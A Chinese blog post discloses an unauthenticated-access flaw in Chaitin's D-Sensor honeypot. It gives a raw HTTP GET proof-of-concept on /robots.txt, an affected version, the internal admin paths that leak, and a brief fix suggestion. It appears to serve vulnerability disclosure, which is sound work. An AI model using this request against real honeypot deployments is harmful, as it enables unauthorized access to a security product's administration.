长亭D-Sensor谛听蜜罐逻辑缺陷漏洞

最新推荐文章于 2024-05-01 11:28:52 发布
最新推荐文章于 2024-05-01 11:28:52 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 安全测试:web\app\工具 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43650289/article/details/116702261
版权

长亭D-Sensor谛听蜜罐逻辑缺陷漏洞

目录

长亭D-Sensor谛听蜜罐逻辑缺陷漏洞

官网

漏洞描述

漏洞URL

影响版本

过程

修复建议

官网

https://www.chaitin.cn/zh/    长亭科技

漏洞描述

通过访问该网站系统,使用/robots.txt路径发生跳转现象,进行抓包测试;发现可在未授权的情况下进行操作系统内部的各个模块,同时泄露模块的URL敏感路径;

漏洞URL

https://8.1.1.8/robots.txt

影响版本

DS-S40-21.03.001_r10

过程

访问https://8.1.1.8/login

 

访问https://8.1.1.8/robots.txt因出现跳转情况,抓包进行测试,可观察到系统内部的模块分布信息

 

 

POC如下

GET /robots.txt HTTP/1.1

Host: XXXX

Connection: close

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: csrftoken=2KUh0dArZGhpXu9WULYDyKSqfkEObtbOe16NqVvpuXM8CVoo4yqfuhwOEuw9rVeM

 

 

点击发送forward模块

 

 

可点击各个模块观察系统内容和URL的目录信息

 

 

目录信息如下:

 

/setting/update

/setting/whitelist

/user/manage

/agents/list

/node/honeynets

/event_log/analysis

/summary/summary

修复建议

进行权限逻辑处理;

战神/calmness
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
逻辑陷阱型蜜罐合约
weixin_30230009的博客
01-22 2864
蜜罐是传统安全领域中的一个概念,通常指安全人员设置一些陷阱(比较明显的漏洞),让攻击者自己掉入我们设置好的陷阱中,以便安全人员分析攻击者的作恶手法。蜜罐合约(HoneyPots Contract)也是类似的概念,但对象变了,一般指合约开发者设置了看似容易获利的合约逻辑,但其实是陷阱,普通用户观察合约,发现有利可图,便与蜜罐合约交互,结果发现交互的资产无法被自己提出。蜜罐合约在中文圈子有时也称为貔貅...
蜜罐与蜜网技术PPT
09-05
网络安全中的蜜罐与蜜网技术 幻灯片详细讲解
2024年最新网络安全-蜜罐学习笔记_高交互蜜罐(2)
最新发布
2401_84254364的博客
05-01 345
探针(Probe、Agent):监测未使用的端口和IP段的情况,并对试图进行交互的流量重定向。探针本身需要能做到快速部署,并且对业务不产生影响。蜜罐(Honeypot):在现实世界中,原本是抓熊的,通过伪装成“食物”,引诱熊来享用。在网络安全中,蜜罐是一种入侵诱饵,引诱黑客进行攻击,进而浪费黑客的时间和资源,收集黑客的信息,保留证据。是的蜜罐系统形态,是蜜罐系统最原始的表现形态。蜜饵:一般是一个文件,工作原理和蜜罐类似,也是诱使攻击者打开或下载。
蜜罐诱捕——KFSensor
亦在春风的博客
01-23 5039
KFSensor软件安装 访问官网 http://www.keyfocus.net/kfsensor/help/ 获得安装包选择合适版本 我选择是第一个版本 安装很简单一直next就可以 打开页面如下 测试一下,没扫描之前 主机使用nmap扫描 查看软件可知受到扫描 KFSensor是一款基于IDS的安全工具,通过模拟FTP、POP3、HTTP、Telnet、SMTP 等服务,吸引黑客的攻击。通过详细的安全检测报告,实时监测本地计算机。 蜜罐诱捕 当发现有人扫描该计算机时,每扫描一个端口KF
蜜罐,就是用来当炮灰的!
嶶笑怍弹 专栏
04-27 538
蜜罐的类型世界上有形形色色的生物,蜜罐也一样。根据管理员的需要,蜜罐的系统和漏洞设置要求也不尽相同,蜜罐是有针对性的,用于不同场合、不同目的的蜜罐需要开放不同的漏洞并做不同的设置。因此,就产生了多种多样的蜜罐。实系统蜜罐实系统蜜罐是最真实的蜜罐,它运行着真实的系统,并且带着真实可入侵的漏洞,属于最危险的漏洞,但是它记录下的入侵信息往往是最真实的。这种蜜罐安装的系统一般都是原始系统,
网络安全-蜜罐学习笔记
关注网络安全、云原生安全
02-09 1万+
目录什么是蜜罐蜜罐的概念蜜罐的分类蜜罐的历史开源蜜罐cowrieT-potHfish国内蜜罐产品知道创宇 - 创宇蜜罐关键词用户痛点解决方案使用长亭科技 - 谛听关键词用户痛点与解决方案使用观安 - 魅影主要功能应用场景锦行科技 - 幻云一些思考参考 什么是蜜罐蜜罐的概念 蜜罐(Honeypot):在现实世界中,原本是抓熊的,通过伪装成“食物”,引诱熊来享用。在网络安全中,蜜罐是一种入侵诱饵,引诱黑客进行攻击,进而浪费黑客的时间和资源,收集黑客的信息,保留证据。是具有单个诱饵节点的蜜罐系统形态,是蜜
anti-honeypot:可以用来检测WEB蜜罐并中断请求,能够识别并中断长亭D-sensor和墨安幻阵的部分溯源API
03-20
长亭科技是一家专注于网络安全的公司,D-sensor可能是他们提供的一个安全产品,可能包含蜜罐功能。而“墨安幻阵”可能是另一个安全解决方案的名称,可能也包括蜜罐技术。API(Application Programming Interface)是...
anti-honeypot:一种可以检测WEB蜜罐并中断请求的Chrome插件,能够识别并中断长亭D-sensor,墨安幻阵的部分溯源api
01-30
具有黑名单主机(来自长亭蜜罐api溯源请求)匹配功能:如果匹配到基于蜜罐溯源黑名单的主机,会做另外的弹框预测,如果有多个黑名单主机弹框报警,说明这个蜜罐的可能会比较大。 其余跨主域请求拦截,需要肉眼判断...
tpotce::honey_pot:T-Pot-多合一蜜罐平台:honeybee:
02-15
T-Pot 20.06在Debian(Stable)上运行,很大程度上基于,并包含以下蜜罐的dockerized版本此外,T-Pot包含以下工具轻量级的,用于docker,os,实时性能监控和Web终端的webui。 网络应用程序,用于加密,编码,压缩和...
Python-开源Telnet蜜罐Honeypot
08-10
【Python-开源Telnet蜜罐Honeypot】 在网络安全领域,蜜罐(Honeypot)是一种主动防御技术,它模拟系统或网络资源来吸引并诱捕攻击者。蜜罐通常不承载真实数据,而是收集攻击者的活动信息,帮助研究攻击手段、策略...
hs-honeypot:蜜罐隐藏服务系统
07-13
hs-honeypot - 蜜罐隐藏服务系统 这是构建蜜罐系统的简单方法。 这些脚本部署隐藏服务并设置 nginx 来记录流量。 教程 安装 Tor(来自 Tor 项目存储库的最新版本) 为 Tor 生成 Torrc 配置 $ cp torrc /etc/tor/torcc $ mkdir /var/lib/tor/hss/ $ chmod 777 /var/lib/tor/hss/ 安装 nginx 生成nginx配置 $ rm /etc/nginx/sites-available/default $ cp hs /etc/nginx/sites-available/hs $ ln -s /etc/nginx/sites-available/hs /etc/nginx/sites-enabled/hs 最后,重启服务,你的日志系统就准备好了。 $ service nginx r
探针漏洞_长亭xray:一款自动化Web漏洞扫描神器(免费社区版)
weixin_36212493的博客
01-12 2135
xray 简介xray 是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持 Windows / macOS / Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求。https://www.zhihu.com/video/1145001352550928384特色使用 go 语言编写,...
Sensor框架理解
热门推荐
cs_lht的专栏
11-12 3万+
在这个系列的文章我们只是为了讲清楚Sensor框架的设计和工作原理基于4.0,4.0以下的代码有所区别,尤其是2.2以下根本就没有Binder架构,不讲驱动,也不讲具体的某一个应用该怎么处理Sensor的数据。 一、整体的架构: 从这个图来看Sensor的架构还是非常的清淅, 黄色部分表示硬件,它要挂在I2C总线上 红色部分表示驱动,把驱动注册到Kernel的Input Subsyst
G-sensor工作原理
zhoumin090508的专栏
06-13 1万+
以下来源于简书 作者:WilliamChou 链接:https://www.jianshu.com/p/d471958189a0 一、G-sensor概述 什么是MEMS MEME(Micro-Electro-Mechanical System),微型电子机械系统,也叫微机电系统,是指可批量制作的,将微型机构、微型传感器、微型执行器以及信号处理和控制电路、直至接口、通信和电源等于一体的微型...
新品开源又融资,长亭科技“脱胎而成”!
科技星象
07-13 1799
近日,网络信息安全公司长亭科技在京召开了新品及融资发布会。 会上,扫描器产品洞鉴(X-Ray)和云主机安全产品牧云(CloudWalker)首次进入大众视野,同期还完成亿级B轮融资,可谓“双喜临门”。 联合创始人及CEO陈宇森表示,新品牧云(CloudWalker)将于9月底正式开源,至此长亭成为国内第一家实现软件产品开源的网络安全公司。 脱胎于蓝莲花战队的长亭科技,于2014年正式诞生...
蜜罐的分类及优缺点
红梅花儿开
08-05 1万+
蜜罐的分类:      蜜罐可以按照其部署目的分为产品型蜜罐和研究型蜜罐两类,产品型蜜罐的目的在于为一个组织的网络提供安全保护,包括检测攻击、防止攻击造成破坏及  帮助管理员对攻击做出及时正确的响应等功能。一般产品型蜜罐较容易部署,而且不需要管理员投入大量的工作。较具代表性的产品型蜜罐包括DTK、honeyd等开源工具和KFSensor、ManTraq 等一系列的商业产品。研究型蜜罐则是专
2020HW必备-蜜罐如何在攻防演练中战术部防
zhangge3663的博客
09-17 2330
原创作者:长亭科技,已获授权。 文末记得获取《红蓝对抗——蓝队手册》,或许对你目前的HW工作有参考价值。 网络攻防演练活动以模拟真实攻击为重要标准,对参与演练单位的各类系统进行渗透,通过设定演练规则,根据统计攻击和防守方得失分情况,判定防守方防护能力水平。在这个过程中,防守方对攻击方是谁、从哪里发动攻击、用何种手段均一无所知,处于“攻防不对称”下的天然劣势。 本次我们将以某个行业开展的攻防演练活动为示例,从防守方的视角,看其怎样利用欺骗伪装技术,实现主动对抗,及时诱捕、发现、处置、溯源,甚至..
关于网络安全里蜜罐的详细介绍
HoewDec的博客
05-25 3569
蜜罐的定义 蜜罐的一个定义来自间谍世界,玛塔哈里 (Mata Hari) 式的间谍将恋爱关系用作窃取秘密的方式,被描述为设置“美人计”或“蜜罐”。经常会有敌方间谍中了美人计,然后被迫交待他/她所知道的一切。 在计算机安全方面,网络蜜罐的工作原理与此类似,是为黑客设下的诱饵。这是一种具有牺牲性质的计算机系统,旨在吸引网络攻击,就像诱饵一样。它模仿黑客的目标,利用黑客的入侵企图来获取网络犯罪分子的信息以及他们的行动方式,或者将他们从其他目标上引开。 蜜罐的工作原理 蜜罐看起来是一个真实的计算机...
honeywall 蜜罐
10-20
蜜罐(Honeywall)是指为了诱使黑客或恶意软件主动攻击而故意制造的一个虚拟环境或系统。蜜罐可以用来收集黑客攻击的数据,以便进一步分析和研究攻击手段,加强网络安全防御能力。 蜜罐一般是一个隐蔽而有吸引力的目标,看似易受攻击,但实际上是一个被专门设计用来捕获攻击者行为的监测系统。它可以模拟各种真实系统中存在的漏洞和弱点,吸引攻击者利用这些漏洞进行攻击。一旦攻击者进入蜜罐,系统会记录他们的行为和使用的工具,并自动通知安全人员。 蜜罐还可以帮助分析黑客的攻击技术和手段,了解攻击者的行为模式,从而及时进行更新和完善自身的安全措施。通过不断改进蜜罐系统的设计,可以增加黑客攻击的难度,提高网络安全的水平。 但同时,蜜罐也存在一定的风险。如果安全人员管理不当,攻击者可能会利用蜜罐获取有关真实系统的敏感信息,进一步发起有针对性的攻击。因此,保护蜜罐的安全,以及与其他系统隔离是非常重要的。 总的来说,蜜罐是一种有趣而实用的安全工具,它通过诱使攻击者主动攻击,为我们提供了了解黑客攻击手段,改进网络安全防御的机会。然而,蜜罐的建立和使用需要谨慎,以确保安全管理和保护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值